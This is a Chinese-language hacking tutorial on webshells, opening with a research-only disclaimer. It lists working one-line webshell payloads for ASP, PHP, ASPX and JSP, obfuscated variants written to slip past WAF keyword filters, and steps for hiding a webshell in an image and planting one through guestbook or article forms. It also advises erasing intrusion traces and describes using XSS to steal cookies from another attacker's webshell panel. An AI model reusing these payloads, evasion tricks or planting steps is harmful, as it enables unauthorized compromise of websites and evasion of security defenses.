提示:本文所讨论的技术仅用于研究学习,旨在提高大家信息安全意识,任何人不得将其用于非法目的。
@木马及木马后门的讲解,webshell箱子溯源追踪
一:webshell制作原理
webshell:即web网站后门 getshell:是指拿webshell的过程1.webshell的种类
- 一句话木马
- 小马
- 大马
- 打包马
- 脱裤马
2.一句话木马:
介绍:一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
这是一个一句话木马,我们把它插入到asp的网页中,然后用菜刀链接一下就可以
<%execute request("value")%>
X.asp
xxxx.com/X.asp?value=assdadasad
工作原理:
黑客在注册信息的电子邮箱或者个人主页等中插入类似的如下代码:
<%execute request("value")%>
其中value是值,所以你可以更改自己的值,前面的request就是获取这个值
<%eval request(“value”)%>(现在比较多见,而且字符少,对表单字数有限制的地方特别的实用)
当知道了1数据库的URL,就可以利用本地一张网页进行连接得到webshell。(不知道数据库也可以,只要知道<%eval request(value)%>这个文件被插入到哪一个ASP文件里面就可以了)
这就被称作一句话木马,它是基于B/S结构的。
3.常见写法
asp一句话木马:
<%eval request("c")%>
php一句话木马:
<?php @eval($_POST[value])?>
aspx一句话木马:
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
jsp一句话:
< % if(request.getParametere("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")))write(request.getParameter("t").getBytes());% >
4.一句话木马变形记
让一句话木马变形绕过 WAF:
WAF通常会以关键字判断是否为一句话木马,所以要将一句话木马变形使用,从而绕过 waf。
后期我还会用大量篇幅来具体的讲解一下木马的制作。
<?php $_REQUEST['a']($_REQUEST['b'])?>
<%Eval(Request(chr(112)))%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("xindong"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%a=request("gold")%><%eval a%>
5.一句话图片马的制作
C32下做一句话
打开C32,把图片放里面,写入一句话保存,退出
我们在制作图片马的时候,也可以同时添加asp,php等其他脚本的木马,这样就拥有了两用的木马。
制作图片马时,要尽量找网站素材图片,这些图片管理员看到也不敢乱删
6.常见的一句话客户端:
- 中国菜刀
- 冰蝎
- 蚁剑
这些都是常见的一句话客户端,不过要小心一下后门。
7.小马
小马体积小,容易隐蔽,隐蔽性强,最重要在于与图片结合一起,上传之后可以利用nginx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能,通常用小马上传大马,然后利用大马进行复杂操作后,再删除大马,在渗透过程中要尽量擦除自己留下的痕迹。
8.大马
大马体积比较大,一般50K以上。功能也多,一般都包括提权命令,磁盘管理,数据库连接接口,执行命令甚至有些具备自带提权功能和压缩,解压缩网站程序的功能。这种马隐蔽性不好,而大多如不加密的话很多杀毒厂商开始追杀此类程序。
二:webshell使用技巧
1.一句话的使用:
- 首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库,或者加进asp网页。
- 记住!我们的目的是把一句话<%execute request(“value”)%>添加到数据库,无论任何方式。
- 然后打开客户端(就是你电脑上面的那个html文件),填上加入了一句话的asp文件,或者asp网页,然后进入此网站服务器。
2.小马的使用
主要用来上传大马,然后利用大马进行复杂操作后,再删除大马,在渗透过程中要尽量擦除自己留下的痕迹。
下面让我们参观一个小马:
3.大马的使用
- 用途
- 提权
- 打包
- 脱裤
- 增删文件
下面让我们看一下大马的情况:
这就是一个大马的界面,大马具有很多的功能,对于后渗透操作将非常有帮助。
4.使用技巧
- 内容编码
- 配合解析漏洞
- 配合文件包含
- 利用文件名溢出
三:webshell黑吃黑
1.找shell后门
- 查找后门
- 查找webshell后门
- 找到后门地址
- 反搞webshell箱子
2.找一句话客户端后门
- 查找客户端程序后门
- 反搞webshell箱子
3.实验
下面让我们通过一个实验感受一下"webshell黑吃黑"的过程吧:
假设我们已经在某企业网站上种植了我们从别人手中购买的木马。
通过分析发现了如下后门
然后我们再分析一下木马b.asp的文件,果然证实了上面的想法。
面对这种情况,我们该怎么办呢?
别慌!让我们通过XSS来反搞一下。
当然还有cookie信息,有了这些东西我们就能登录这个webshell箱子了
此时,表示我们已经成功的打掉了另一个黑客的阴谋。
你以为我在第一层,不,我在大气层。